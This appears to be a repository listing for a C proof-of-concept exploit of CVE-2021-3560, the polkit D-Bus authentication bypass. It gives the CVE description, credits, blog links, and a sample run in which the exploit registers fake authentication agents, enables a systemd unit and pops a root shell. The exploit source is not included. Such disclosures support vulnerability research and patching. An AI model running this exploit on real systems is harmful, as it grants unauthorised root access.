CVE-2021-3560 PoC — polkit code issue vulnerability

Associated Vulnerability
Title: polkit code issue vulnerability (CVE-2021-3560)
Description: It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
Description
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
Readme
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
====
C implementation of the CVE-2021-3560 exploit. Blog posts describing this exploitation technique:
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation

### Contributors
Code by swing (@WinMin) and Ricter Z (@RicterZ)

### Usage
```
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#
```